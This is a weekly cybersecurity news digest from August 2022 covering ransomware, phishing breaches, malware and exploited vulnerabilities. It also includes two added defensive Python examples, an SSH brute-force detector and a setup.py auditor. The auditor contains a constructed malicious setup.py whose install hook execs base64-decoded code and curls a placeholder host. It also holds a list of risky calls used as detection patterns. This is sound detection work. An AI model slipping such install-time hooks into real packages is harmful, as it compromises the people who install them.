12 August 2022

Cyber security week in review: August 12, 2022


A ransomware attack triggers UK emergency services system outage

The United Kingdom’s National Health Service (NHS) 111 telephone service, used for medical emergencies, suffered a major outage caused by a ransomware attack that targeted Advanced, a firm providing digital services for NHS 111. The attack affected Advanced's Adastra client patient management solution used to refer patients for care. The company did not disclose the ransomware group behind the incident. The provider has yet to determine how the intruders breached the system and whether data was stolen.

Twilio, Cloudflare employees targeted in a phishing attack

Digital communication platform Twilio has suffered a data breach after some of the company’s employees fell victim to a phishing campaign that tricked them into providing their login credentials. The attackers then used the stolen credentials to gain access to Twilio’s internal systems and certain customer data. According to Twilio, only “a limited number” of customer accounts were affected by the attack.

Just a day after Twilio’s disclosure, the content delivery network and DDoS mitigation company Cloudflare revealed that its employees were targeted in a similar attack. The company said that although three of its employees took the bait, it was able to thwart the attack and that no Cloudflare systems were compromised.

A ransomware attack knocked out 7-Eleven stores in Denmark

Major convenience store chain, 7-Eleven, was forced to temporarily close its stores in Denmark after a ransomware attack disrupted shops’ payment and checkout systems across the country. There is no further information about the attack, including what ransomware was utilized, or whether data was stolen in the attack.

US bans Tornado Cash cryptocurrency mixer used by North Korean hackers

The US Department of the Treasury’s Office of Foreign Assets Control (OFAC) has imposed sanctions on Tornado Cash, a popular virtual currency mixer, for allegedly helping to launder more than $7 billion worth of cryptocurrency since its creation in 2019, including $455 million stolen by a North Korean state-sponsored threat actor known as Lazarus Group.

The OFAC said that Tornado Cash was also used to launder more than $96 million of malicious cyber actors’ funds stolen from the Harmony Bridge platform in June, and at least $7.8 million from the recent Nomad heist.

Rapidly evolving IoT RapperBot malware targets Linux systems using SSH brute force

A new IoT malware, dubbed “RapperBot,” has been observed targeting Linux systems. Like many other IoT malware families, RapperBot is based on Mirai source code, although it uses brute force to gain access to SSH servers instead of Telnet as implemented in Mirai.

First discovered in June 2022 by researchers at FortiGuard Labs, the malware also has functionality that allows it to maintain persistence in order to provide threat actors continued access to infected devices via SSH even after the device is rebooted or the malware has been removed.
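The SSH brute-force behaviour described above leaves a recognisable trail in sshd logs: many failed passwords for different usernames from one source in a short window, sometimes followed by a successful login. The following detector is an added example, not code from the original article or from FortiGuard Labs; the log lines are constructed and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH auth.log sample (not real data): one source cycling through
# default accounts and finally succeeding, plus a benign login from elsewhere.
SAMPLE_AUTH_LOG = """\
Aug 12 10:00:01 host sshd[1001]: Failed password for root from 192.0.2.10 port 40001 ssh2
Aug 12 10:00:02 host sshd[1002]: Failed password for invalid user admin from 192.0.2.10 port 40002 ssh2
Aug 12 10:00:03 host sshd[1003]: Failed password for invalid user pi from 192.0.2.10 port 40003 ssh2
Aug 12 10:00:04 host sshd[1004]: Failed password for root from 192.0.2.10 port 40004 ssh2
Aug 12 10:00:05 host sshd[1005]: Failed password for invalid user ubnt from 192.0.2.10 port 40005 ssh2
Aug 12 10:00:09 host sshd[1006]: Accepted password for root from 192.0.2.10 port 40006 ssh2
Aug 12 10:05:00 host sshd[1007]: Failed password for alice from 198.51.100.7 port 50000 ssh2
Aug 12 10:05:03 host sshd[1008]: Accepted publickey for alice from 198.51.100.7 port 50001 ssh2
"""

FAILED_RE = re.compile(r"^(\w{3} +\d+ [\d:]+) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"^(\w{3} +\d+ [\d:]+) \S+ sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")

def _ts(stamp, year=2022):
    # syslog timestamps carry no year; the year is an assumption for the sample
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def find_bruteforce(log_text, threshold=5, window_s=60):
    """Return {ip: {"failures", "users", "success_after"}} for every source that
    produced `threshold` or more failed logins inside `window_s` seconds."""
    fails = defaultdict(list)    # ip -> [(timestamp, user)]
    accepts = defaultdict(list)  # ip -> [(timestamp, method, user)]
    for line in log_text.splitlines():
        if m := FAILED_RE.match(line):
            fails[m[3]].append((_ts(m[1]), m[2]))
        elif m := ACCEPTED_RE.match(line):
            accepts[m[4]].append((_ts(m[1]), m[2], m[3]))
    hits = {}
    for ip, events in fails.items():
        events.sort()
        # sliding window: flag the source if any `threshold` consecutive failures fit in window_s
        for i in range(len(events) - threshold + 1):
            if (events[i + threshold - 1][0] - events[i][0]).total_seconds() <= window_s:
                last_fail = events[-1][0]
                hits[ip] = {
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    # a success after the last failure is the case worth paging on
                    "success_after": any(t >= last_fail for t, _, _ in accepts.get(ip, [])),
                }
                break
    return hits
```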

Microsoft fixes yet another MSDT zero-day exploited in the wild

Microsoft has rolled out its August 2022 Patch Tuesday security updates designed to fix over 100 security vulnerabilities in the Windows operating system and related software, including a zero-day flaw being actively exploited by hackers.

Tracked as CVE-2022-34713 (aka “DogWalk”), the zero-day in question is a buffer overflow issue, which exists due to a boundary error in Windows Support Diagnostic Tool (MSDT) when processing files. It allows a remote attacker to execute arbitrary code on the target system by tricking a victim into opening a malicious file.

The flaw affects all supported Windows versions, including Windows 11 and Windows Server 2022.

10 malicious packages found in PyPI repository

Security researchers have discovered a set of 10 software packages containing malicious code in the Python Package Index (PyPI) repository, which turned out to be droppers for information-stealing malware. According to Check Point researchers, the bad actors behind the malicious packages embedded malicious code into the package installation script so the malware would be installed on a victim’s machine unnoticed.
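Because the dropper code was placed in the package installation script, a defender reviewing a package before installing it wants to know whether its setup.py hooks the install step or calls anything that decodes and runs code. The following static check is an added example, not code from the original article or from Check Point; both setup.py samples are constructed, and the lists of risky calls and hooked commands are assumptions a reviewer would tune.

```python
import ast

# Constructed setup.py that subclasses the install command to run decoded code;
# not taken from any real PyPI package.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import base64, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
        subprocess.Popen(["curl", "http://example.invalid/x"])

setup(name="demo", version="0.1", cmdclass={"install": PostInstall})
'''

BENIGN_SETUP = '''
from setuptools import setup
setup(name="demo", version="0.1", packages=["demo"])
'''

RISKY_CALLS = {"exec", "eval", "compile", "b64decode", "urlopen", "Popen", "system", "check_output"}
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}  # setuptools commands run by pip

def _name(node):
    # plain name (exec) or attribute (subprocess.Popen) -> final identifier
    return node.id if isinstance(node, ast.Name) else getattr(node, "attr", None)

def audit_setup_py(source):
    """Return sorted findings describing install-time risks in a setup.py source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _name(node.func)
            if name in RISKY_CALLS:
                findings.add(f"risky call at line {node.lineno}: {name}")
            if name == "setup":
                # cmdclass={...} replaces the standard install commands with package code
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        for key in kw.value.keys:
                            if isinstance(key, ast.Constant) and key.value in INSTALL_HOOKS:
                                findings.add(f"custom {key.value} command at line {node.lineno}")
        elif isinstance(node, ast.ClassDef):
            # subclassing setuptools' install/develop commands hooks installation
            for base in node.bases:
                if _name(base) in INSTALL_HOOKS:
                    findings.add(f"class {node.name} overrides {_name(base)} at line {node.lineno}")
    return sorted(findings)
```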

US authorities offer a $10 million reward for intel about Conti ransomware gang

The US State Department has announced new rewards of up to $10 million for useful information about individual members of the now-defunct Conti ransomware group. Specifically, the authorities are interested in details about five key members of the Conti group: individuals using the monikers “Professor”, “Reshaev”, “Tramp”, “Dandis”, and “Target”. The agency also published an alleged photo of a person believed to be “Target.”

Cisco confirms it was targeted by a cyberattack

Cisco Systems shared details of the May attack, which used a compromised employee’s Google account that contained passwords synced from their web browser to gain initial access to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to log in to multiple systems, and dropped a number of tools, including remote access software like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, as well as their own backdoor accounts and persistence mechanisms.

Cisco said it was able to purge the attacker from the systems. The company attributed the attack to an initial access broker with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.

Data of 48.5 million users of Shanghai's COVID app is offered for sale

A user who goes under the handle “XJP” has posted an offer on a hacker forum to sell personal data of 48.5 million users of a COVID health code mobile app run by the city of Shanghai for a price of $4,000. The seller provided a small sample of the data, which included phone numbers, names, Chinese identification numbers and health code status.

An automotive supplier was hit with three separate ransomware attacks within two weeks

An unnamed automotive supplier had its systems breached by three separate ransomware groups, with two of the attacks launched within just two hours.

While all three threat actors used different ransomware strains and attack techniques, all of them took advantage of a firewall rule that exposed Remote Desktop Protocol (RDP) on a management server.

The first attacker, Lockbit, exfiltrated data to the Mega cloud storage service, used Mimikatz to extract passwords, and distributed their ransomware binary using PsExec. The second ransomware group, Hive, used RDP to move laterally, before dropping their ransomware just two hours after Lockbit. After the victim restored data from backups, an ALPHV/BlackCat affiliate accessed the network, installed Atera Agent, a legitimate remote access tool, to establish persistence, and exfiltrated data. Two weeks after the Lockbit and Hive attacks, the threat actor distributed their ransomware.

Experts observe a minor decline in ransomware attacks on industrial orgs after Conti shutdown

As ransomware groups have continued to target industrial organizations and infrastructures in the second quarter of 2022, security researchers have observed a slight drop in ransomware incidents from 158 in Q1 to 125 in Q2. This may be attributed to the shutdown of the Conti ransomware operation in mid-May 2022, which accounted for about 25% of the total ransomware incidents targeting industrial organizations and infrastructures in the last two quarters.

According to industrial cybersecurity company Dragos, 33% of the ransomware attacks in Q2 were conducted by the LockBit group, followed by Conti (13%), Black Basta (12%), Quantum (7%), AlphV and Hive (4% each). Globally, 37% of the ransomware attacks targeted industrial organizations and infrastructures in Europe, followed by North America (29%), Asia (26%), South America (5%), the Middle East (3%), and Africa (1%).

Experts warn of ongoing mass exploitation of Zimbra RCE vulnerability

The US Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities Catalog to add two Zimbra vulnerabilities actively exploited in the wild.

The security issues (CVE-2022-27925 and CVE-2022-37042) affect the Zimbra Collaboration Suite software and, according to researchers at Volexity, have already been exploited by threat actors to hack into vulnerable Zimbra Collaboration Suite (ZCS) email servers.

CVE-2022-27925 allows a remote user to perform directory traversal attacks, while CVE-2022-37042 is an authentication bypass in MailboxImportServlet, which can be exploited to gain unauthorized access to the application. The researchers believe that CVE-2022-27925 has been exploited in conjunction with CVE-2022-37042 since at least the end of June 2022. Volexity says there are more than 1,000 compromised Zimbra instances worldwide, with most of them located in the United States, Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.
